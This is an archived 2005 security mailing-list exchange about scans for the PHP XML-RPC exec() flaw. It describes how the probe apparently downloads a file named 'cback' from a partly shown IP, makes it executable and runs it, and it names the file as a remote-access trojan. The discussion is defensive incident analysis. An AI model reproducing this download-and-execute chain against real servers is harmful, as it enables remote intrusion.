[Dshield] Someone is scanning for PHP XML RPC vulnerability

Tom dshield at oitc.com
Tue Oct 11 13:09:53 GMT 2005

At 9:31 AM +0200 10/11/05, Stephane Grobety wrote:
>Apparently, someone is actively scanning for the PHP XMLRPC flaw. All
>my web servers and three completely separate networks have been probed.
>All the probes came from the same source IP:
>The following locations are probed:
>Unfortunately, I don't quite understand the command it gives to the
>script, I think it's trying to connect back to on 8080
>and the presence of chmod, in seems to indicates that it targets unix
>The relevant parameter is:
>Does someone understand this script ?

Exploit was documented back in the summer and if users patched they 
should be OK. As stated in 
http://forum.hardened-php.net/viewtopic.php?id=9 its a exec() 
exploit, What the above looks like is a piece of broken? code.  The 
".60.255.44/cback" would appear to be broken. it probably was 
curl/get from some IP the code/script called cback which is made 
executable and executed with parameters of 8080.  cback 
appears to be the remote access trojan, BackDoor-CTM 


More information about the list mailing list